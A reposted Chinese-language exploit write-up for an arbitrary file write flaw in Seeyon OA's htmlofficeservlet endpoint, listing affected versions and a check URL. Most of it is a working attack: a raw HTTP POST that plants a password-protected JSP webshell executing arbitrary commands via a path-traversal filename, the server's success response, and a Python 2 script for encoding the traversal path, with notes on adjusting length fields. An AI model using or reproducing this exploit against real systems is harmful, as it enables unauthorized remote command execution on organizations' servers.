致遠OA htmlofficeservlet任意文件寫入漏洞

本文轉載自查看原文 2021-01-25 15:57 1170 漏洞復現

0x00 影響版本：

致遠A8-V5協同管理軟件V6.1sp1
致遠A8+協同管理軟件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致遠A8+協同管理軟件V7.1

0x01 檢查漏洞是否存在：

訪問 /seeyon/htmlofficeservlet
顯示結果：
DBSTEP V3.0 0 21 0 htmoffice operate err

0x02 EXP

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

成功響應：

DBSTEP V3.0     386             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

0x03 上傳文件名加解密腳本

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

# qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp
import base64

a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="  
b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out = ""

c = input("\n1.加密  2.解密  0.退出\n\n請選擇處理方式：")

while c != 0:
    out = ""
    if c == 1:
        str = raw_input("\n請輸入要處理的字符串：")
        str = base64.b64encode(str)
        for i in str:
                out += b[a.index(i)]
        print("\n處理結果為："+out)
    elif c == 2:
        str = raw_input("\n請輸入要處理的字符串：")
        for i in str:
                out += a[b.index(i)]
        out = base64.b64decode(out)
        print("\n處理結果為："+out)
    else:
        print("\n輸入有誤！！只能輸入“1”和“2”，請重試！")
    c = input("\n1.加密  2.解密  0.退出\n\n請選擇處理方式：")

修改webshell信息還需要修改355和666參數：
355為從哪里開始讀源碼，666為寫入的webshell源碼長度

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 致遠OA任意文件上傳漏洞復現 seeyou 致遠OA 任意文件上傳致遠 OA A8 htmlofficeservlet getshell 漏洞致遠OA 任意文件下載漏洞（webmail.do文件）致遠OA-ajax.do任意文件上傳漏洞復現 Aria2任意文件寫入漏洞 Tomcat任意文件寫入漏洞藍凌OA前台任意文件讀取漏洞利用通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現